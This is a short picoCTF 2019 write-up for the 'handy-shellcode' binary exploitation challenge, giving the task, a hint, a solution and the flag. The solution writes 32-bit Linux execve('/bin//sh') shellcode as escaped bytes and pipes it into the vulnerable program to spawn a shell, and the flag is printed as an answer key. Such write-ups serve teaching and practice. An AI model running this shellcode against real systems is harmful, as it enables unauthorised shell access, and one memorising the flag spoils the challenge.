# handy-shellcode

Point: 50

## Category

Binary Exploitation

## Question

This [program](https://2019shell1.picoctf.com/static/f5f38a3523dffd5f487719d1f35815a0/vuln) executes any shellcode that you give it. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/handy-shellcode\_1\_ebc60746fee43ae25c405fc75a234ef5 on the shell server. [Source](https://2019shell1.picoctf.com/static/f5f38a3523dffd5f487719d1f35815a0/vuln.c).

## Hint

You might be able to find some good shellcode online.

## Solution

```bash
echo -e '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' > ~/asdf 
cat ~/asdf - | ./vuln
```

## Flag

picoCTF{h4ndY\_d4ndY\_sh311c0d3\_2cb0ff39}